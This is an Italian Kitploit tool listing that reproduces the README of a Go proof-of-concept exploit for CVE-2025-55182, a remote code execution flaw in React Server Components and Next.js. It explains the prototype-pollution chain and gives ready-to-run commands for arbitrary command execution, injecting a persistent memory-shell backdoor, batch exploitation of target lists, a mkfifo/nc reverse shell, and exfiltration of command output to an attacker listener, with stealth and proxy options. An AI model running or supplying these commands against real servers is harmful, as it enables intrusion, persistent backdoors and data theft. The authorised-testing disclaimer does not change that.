Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-golang-PoC — Proof-of-concept basato su Go per CVE-2025-55182, una RCE critica in React Server Components. Include controllo delle vulnerabilità, esecuzione di comandi, iniezione di shell in memoria, reverse shell, scansione batch e supporto proxy per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

Proof-of-concept basato su Go per CVE-2025-55182, una RCE critica in React Server Components. Include controllo delle vulnerabilità, esecuzione di comandi, iniezione di shell in memoria, reverse shell, scansione batch e supporto proxy per test di sicurezza autorizzati.

Vedi RepositorySito web
6199 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ SOLO PER TEST DI SICUREZZA AUTORIZZATI ⚠️

Descrizione

CVE-2025-55182 (nota anche come CVE-2025-66478) è una vulnerabilità critica di Remote Code Execution nei React Server Components (protocollo Flight). Questo strumento è un'implementazione Go del PoC per la ricerca sulla sicurezza e test di penetrazione autorizzati.

Versioni affette:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (prima delle patch: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (prima di 16.0.7)
  • Next.js: 14.3.0-canary.77 e versioni canary successive

Dettagli della vulnerabilità

Lo sfruttamento sfrutta l'inquinamento del prototipo nella deserializzazione del protocollo Flight:

  1. Utilizza la deserializzazione $@ per ottenere un riferimento a un Chunk
  2. Posiziona Chunk.prototype.then come proprietà then dell'oggetto root
  3. Imposta lo stato su RESOLVED_MODEL per chiamare initializeModelChunk con un falso chunk controllato
  4. Attiva la deserializzazione Blob che chiama response._formData.get con il payload dell'attaccante
  5. Imposta response._formData.get sul costruttore Function per l'esecuzione di codice arbitrario

Funzionalità

  • Capacità RCE completa - Esegui comandi arbitrari con output
  • Modalità controllo vulnerabilità - Rilevamento sicuro senza sfruttamento
  • Rilevamento versione Next.js - Impronta digitale automatica della versione
  • Iniezione Memory Shell - Backdoor persistente su /exec?cmd=
  • Scansione batch - Scansione multi-thread con output JSON
  • Supporto proxy completo:
    • SOCKS5 con/senza autenticazione
    • SOCKS4/SOCKS4a
    • Proxy HTTP/HTTPS con/senza autenticazione
  • Modalità invisibile - User-Agent browser, crawler, sicurezza
  • Limitazione della frequenza - Ritardi configurabili tra le richieste
  • Reverse shell - mkfifo + nc (funziona su Alpine/busybox)
  • Esfiltrazione dati - Output dei comandi tramite POST verso server attaccante
  • Build multipiattaforma - Oltre 30 combinazioni OS/architettura
  • Output JSON - Risultati leggibili dalla macchina per automazione

Installazione

Binari precompilati

Scarica l'ultima release per la tua piattaforma da GitHub Releases.

Binari disponibili:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
  • E altro ancora...

Dai sorgenti

# Clona il repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build per la piattaforma corrente
go build -o cve-2025-55182 .

# Oppure build per tutte le piattaforme
chmod +x build.sh
./build.sh

Build dai sorgenti

Dopo aver eseguito ./build.sh, i binari saranno disponibili nella directory build/ per tutte le piattaforme supportate.

Utilizzo

Comandi di base

# Verifica vulnerabilità su singolo target
./cve-2025-55182 -u http://target:3000 --check

# Rileva versione Next.js
./cve-2025-55182 -u http://target:3000 --version-check

# Esegui comando con output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

Memory Shell (Backdoor persistente)

# Inietta memory shell (verifica prima se già installata)
./cve-2025-55182 -u http://target:3000 --memshell

# Verifica se la memory shell è attiva
./cve-2025-55182 -u http://target:3000 --test-shell

# Esegui comando tramite memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# Dopo l'iniezione, puoi anche usare curl direttamente:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

Intestazioni personalizzate e bypass SSL

# Aggiungi intestazioni personalizzate (utilizzabile più volte)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Salta verifica certificato SSL (per certificati autofirmati)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combina con altre opzioni
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

Supporto proxy

# SOCKS5 con autenticazione
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 senza autenticazione
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# Proxy SOCKS4
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# Proxy HTTP
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

Scansione batch

# Controllo batch da file
./cve-2025-55182 --urls targets.txt --check

# Scansione batch con output JSON
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Scansione batch con thread multipli e modalità invisibile
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Salva target vulnerabili su file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Iniezione memory shell batch
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Esecuzione comandi batch
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

Esfiltrazione di rete

# Reverse shell (mkfifo + nc, funziona su Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Avvia prima il listener sulla macchina attaccante:
nc -lvnp 4444

# Esfiltra output comando tramite HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Avvia listener: nc -lvnp 4444

Opzioni

OpzioneDescrizione
-u, --urlURL del target (es. http://localhost:3000)
-f, --fileFile contenente URL target (uno per riga)
--urlsAlias per -f/--file
-o, --outputFile di output per target vulnerabili
--jsonOutput risultati in formato JSON
-c, --commandComando da eseguire (con output)
--checkControlla la vulnerabilità
--version-checkRileva versione Next.js
--proxyURL proxy (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
-H, --headerIntestazione personalizzata (utilizzabile più volte)
-k, --insecureSalta verifica certificato SSL/TLS
--stealthModalità invisibile: browser, crawler, security (default: browser)
--delayRitardo tra le richieste (es. 2s, 500ms)
--variantsUtilizza varianti multiple di payload per controllo approfondito
--memshellInietta memory shell (backdoor persistente)
--test-shellVerifica se la memory shell è attiva
--shell-execEsegui comando tramite memory shell
--revshell IP PORTStabilisci reverse shell
--exfil CMD IP PORTEsegui comando e invia output tramite POST
-t, --timeoutTimeout richiesta in secondi (default: 15)
--threadsNumero di thread concorrenti (default: 10)
--workersAlias per --threads
--nocolorDisabilita output colorato (per Windows/pipe)
-h, --helpMostra messaggio di aiuto
-v, --versionMostra versione

Tipi di proxy

socks5://user:pass@ip:port  - SOCKS5 con autenticazione
socks5://ip:port            - SOCKS5 senza autenticazione  
socks5h://ip:port           - SOCKS5 con risoluzione DNS remota
socks4://ip:port            - Proxy SOCKS4
socks4a://ip:port           - Proxy SOCKS4a
http://user:pass@ip:port    - Proxy HTTP con autenticazione
http://ip:port              - Proxy HTTP senza autenticazione
https://ip:port             - Proxy HTTPS

Modalità invisibili

Scarica lo strumento